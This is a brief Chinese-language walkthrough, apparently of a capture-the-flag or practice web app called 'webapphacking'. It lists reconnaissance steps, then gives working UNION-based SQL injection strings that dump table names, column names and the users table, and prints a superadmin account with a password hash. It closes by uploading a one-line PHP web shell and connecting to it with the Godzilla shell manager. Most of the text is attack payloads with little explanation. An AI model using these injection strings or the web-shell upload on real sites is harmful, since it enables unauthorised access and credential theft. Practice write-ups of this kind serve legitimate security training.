1.确认IP
使用御剑端口扫描
2.目录扫描
3.注册账号进入welcome界面
4.sql注入找到用户名密码
验证是否有sql注入
Anonymous Hackers TTP' and 1=1#
Anonymous Hackers TTP' and 1=2#报错
判断字段
Anonymous Hackers TTP' order by 3#
判断回显
-1' union select 1,2,3#
数据库名,表名,列名
-1' union select database(),2,3#
-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#
-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#
-1' union select group_concat(user),group_concat(pasword),3 from users#
得出数据内容:
superadmin 2386acb2cf356944177746fc92523983(Uncrackable)
5.进入superadmin
上传phpinfo()进行验证
6.利用漏洞
上传一句话木马,使用哥斯拉连接